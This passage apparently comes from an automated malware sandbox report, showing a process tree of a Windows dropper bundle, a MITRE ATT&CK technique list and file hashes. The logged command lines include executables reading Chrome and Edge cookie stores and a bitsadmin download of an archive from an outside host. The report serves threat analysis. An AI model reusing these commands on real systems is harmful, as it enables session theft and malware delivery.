                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:6040
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                        PID:5532
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        4⤵
                                                          PID:4116
                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:4892
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                            PID:4708
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:5304
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:4596
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:5184
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                              PID:4724
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              4⤵
                                                                PID:5232
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                  PID:2928
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                    PID:5036
                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in Program Files directory
                                                                  PID:1060
                                                              • C:\Users\Admin\Documents\PYq9V1CpFMPm_onQhf3tx53l.exe
                                                                "C:\Users\Admin\Documents\PYq9V1CpFMPm_onQhf3tx53l.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                PID:4916
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                  3⤵
                                                                    PID:2136
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                    3⤵
                                                                      PID:5852
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                      3⤵
                                                                      • Blocklisted process makes network request
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4484
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                      3⤵
                                                                        PID:5176
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                        3⤵
                                                                          PID:5132
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:3176
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                          3⤵
                                                                          • Checks for any installed AV software in registry
                                                                          PID:5876
                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                          "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                          3⤵
                                                                          • Download via BitsAdmin
                                                                          PID:5196
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            4⤵
                                                                            • Loads dropped DLL
                                                                            • Modifies registry class
                                                                            PID:3564
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psem3MClgGowU1IW -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:936
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ps6ek4NyqJ7KMDc8 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:6024
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                          3⤵
                                                                            PID:6116
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                            3⤵
                                                                              PID:3672
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                              3⤵
                                                                                PID:5336
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                3⤵
                                                                                  PID:4480
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                  3⤵
                                                                                    PID:2024
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\YpwZeOdFLWWW\YpwZeOdFLWWW.dll" YpwZeOdFLWWW
                                                                                    3⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:5356
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\YpwZeOdFLWWW\YpwZeOdFLWWW.dll" YpwZeOdFLWWW
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in System32 directory
                                                                                      PID:4668
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                    3⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5616
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                    3⤵
                                                                                      PID:1588
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                      3⤵
                                                                                        PID:2360
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                        3⤵
                                                                                          PID:5056
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD842.tmp\tempfile.ps1"
                                                                                          3⤵
                                                                                            PID:5280
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                            3⤵
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in Program Files directory
                                                                                            PID:4332
                                                                                        • C:\Users\Admin\Documents\3b1pxjLubuBlHTmOTn5s0_Db.exe
                                                                                          "C:\Users\Admin\Documents\3b1pxjLubuBlHTmOTn5s0_Db.exe"
                                                                                          2⤵
                                                                                            PID:4240
                                                                                            • C:\Users\Admin\Documents\3b1pxjLubuBlHTmOTn5s0_Db.exe
                                                                                              C:\Users\Admin\Documents\3b1pxjLubuBlHTmOTn5s0_Db.exe
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4336
                                                                                          • C:\Users\Admin\Documents\kEPv0UpAnfqp86OsyNoJw5qu.exe
                                                                                            "C:\Users\Admin\Documents\kEPv0UpAnfqp86OsyNoJw5qu.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:2928
                                                                                          • C:\Users\Admin\Documents\5wEBO3OdBb3TMfKDKNsEupQh.exe
                                                                                            "C:\Users\Admin\Documents\5wEBO3OdBb3TMfKDKNsEupQh.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1300
                                                                                            • C:\Users\Admin\Documents\5wEBO3OdBb3TMfKDKNsEupQh.exe
                                                                                              "C:\Users\Admin\Documents\5wEBO3OdBb3TMfKDKNsEupQh.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4240
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_1.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_1.exe" -a
                                                                                          1⤵
                                                                                            PID:2672
                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4360
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                              2⤵
                                                                                              • Loads dropped DLL
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1816
                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            PID:5184
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                              2⤵
                                                                                                PID:3564
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                              1⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Executes dropped EXE
                                                                                              PID:4708
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:4032
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                  PID:5992
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5384
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5624
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:1580
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5812
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5460
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5620
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:5016
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                1⤵
                                                                                                                  PID:3620
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                  1⤵
                                                                                                                    PID:5208

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                  Persistence

                                                                                                                  Modify Existing Service

                                                                                                                  1
                                                                                                                  T1031

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1060

                                                                                                                  BITS Jobs

                                                                                                                  1
                                                                                                                  T1197

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

                                                                                                                  3
                                                                                                                  T1112

                                                                                                                  Disabling Security Tools

                                                                                                                  1
                                                                                                                  T1089

                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                  1
                                                                                                                  T1497

                                                                                                                  BITS Jobs

                                                                                                                  1
                                                                                                                  T1197

                                                                                                                  Install Root Certificate

                                                                                                                  1
                                                                                                                  T1130

                                                                                                                  Credential Access

                                                                                                                  Credentials in Files

                                                                                                                  3
                                                                                                                  T1081

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  6
                                                                                                                  T1012

                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                  1
                                                                                                                  T1497

                                                                                                                  System Information Discovery

                                                                                                                  6
                                                                                                                  T1082

                                                                                                                  Security Software Discovery

                                                                                                                  1
                                                                                                                  T1063

                                                                                                                  Peripheral Device Discovery

                                                                                                                  1
                                                                                                                  T1120

                                                                                                                  Collection

                                                                                                                  Data from Local System

                                                                                                                  3
                                                                                                                  T1005

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                    MD5

                                                                                                                    ed841d4c457ead52231fd3a2ccf235eb

                                                                                                                    SHA1

                                                                                                                    3c3e63ebce85e0ad02116131fa358f15bd685aaa

                                                                                                                    SHA256

                                                                                                                    1b71a0b2da18c33c8067989139712715013e134c0df6fd9d9a99944d665a182d

                                                                                                                    SHA512

                                                                                                                    da144b6500c3fa6e3becb02b9507424e28b4514c410ccc65c2bf2fde457076edef5de8130832d06e3d985bbbdb7ac132df8bf6aced68d9c5fc1ca27868f3fcc1

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                    MD5

                                                                                                                    9be84148228d38d8a7aa04aa003ae49a

                                                                                                                    SHA1

                                                                                                                    83e6cafe58a6ad820ef295825f0d403e55710aae

                                                                                                                    SHA256

                                                                                                                    eae2eb93230894f646f45cec38cc20b03f5075e8b5b6c6639dc487c35e7ad573

                                                                                                                    SHA512

                                                                                                                    eb85383b426ec5cd211fafceaf24d438c8a0d6ac43be2cf9802748de505ada0b4d008548a08834dcc86b4c1b0e3fa5c1a4762e54ab5f6e55ea900e535bc4b578

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                    MD5

                                                                                                                    bad0d880f8c595a4722b03f661aeee3e

                                                                                                                    SHA1

                                                                                                                    4dd82dd68a98657452d3c9d4102be64a4a7d2761

                                                                                                                    SHA256

                                                                                                                    14e223cea65a8a264aeefde4692e2d9db5178ee50300176bcbc509814c6369f4

                                                                                                                    SHA512

                                                                                                                    a3302c148cee2cf09693915fc8ea8899ce246e69811f41ec54e2fb62a9df9e521828ad6b5931397a063af838426bd3d2938c18709408655650b6dea80813d0eb

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                    MD5

                                                                                                                    bad0d880f8c595a4722b03f661aeee3e

                                                                                                                    SHA1

                                                                                                                    4dd82dd68a98657452d3c9d4102be64a4a7d2761

                                                                                                                    SHA256

                                                                                                                    14e223cea65a8a264aeefde4692e2d9db5178ee50300176bcbc509814c6369f4

                                                                                                                    SHA512

                                                                                                                    a3302c148cee2cf09693915fc8ea8899ce246e69811f41ec54e2fb62a9df9e521828ad6b5931397a063af838426bd3d2938c18709408655650b6dea80813d0eb

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                    MD5

                                                                                                                    eef7e9547cee4fc0c42a091802d67d47

                                                                                                                    SHA1

                                                                                                                    a4ce645529402e76f153ae716f0015d10a422f6b

                                                                                                                    SHA256

                                                                                                                    22c5eab8edce2182a10fea89148dd7a3ea6e6e826444e489c2616406cd6e5e63

                                                                                                                    SHA512

                                                                                                                    db32d70352345c331d7e1ef04c4868e5f07cf08cda25dddf8d8ab01cff0b0b60319743500833af64902f5b55a42afeed6429dd23be1b2f02886bf6f9353e5027

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\libcurl.dll
                                                                                                                    MD5

                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                    SHA1

                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                    SHA256

                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                    SHA512

                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\libcurlpp.dll
                                                                                                                    MD5

                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                    SHA1

                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                    SHA256

                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                    SHA512

                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\libgcc_s_dw2-1.dll
                                                                                                                    MD5

                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                    SHA1

                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                    SHA256

                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                    SHA512

                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\libstdc++-6.dll
                                                                                                                    MD5

                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                    SHA1

                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                    SHA256

                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                    SHA512

                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\libwinpthread-1.dll
                                                                                                                    MD5

                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                    SHA1

                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                    SHA256

                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                    SHA512

                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\setup_install.exe
                                                                                                                    MD5

                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                    SHA1

                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                    SHA256

                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                    SHA512

                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\setup_install.exe
                                                                                                                    MD5

                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                    SHA1

                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                    SHA256

                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                    SHA512

                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_1.exe
                                                                                                                    MD5

                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                    SHA1

                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                    SHA256

                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                    SHA512

                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_1.exe
                                                                                                                    MD5

                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                    SHA1

                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                    SHA256

                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                    SHA512

                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_1.txt
                                                                                                                    MD5

                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                    SHA1

                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                    SHA256

                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                    SHA512

                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_2.exe
                                                                                                                    MD5

                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                    SHA1

                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                    SHA256

                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                    SHA512

                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_2.txt
                                                                                                                    MD5

                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                    SHA1

                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                    SHA256

                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                    SHA512

                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_3.exe
                                                                                                                    MD5

                                                                                                                    ee658be7ea7269085f4004d68960e547

                                                                                                                    SHA1

                                                                                                                    979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                    SHA256

                                                                                                                    d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                    SHA512

                                                                                                                    fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_3.txt
                                                                                                                    MD5

                                                                                                                    ee658be7ea7269085f4004d68960e547

                                                                                                                    SHA1

                                                                                                                    979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                    SHA256

                                                                                                                    d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                    SHA512

                                                                                                                    fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

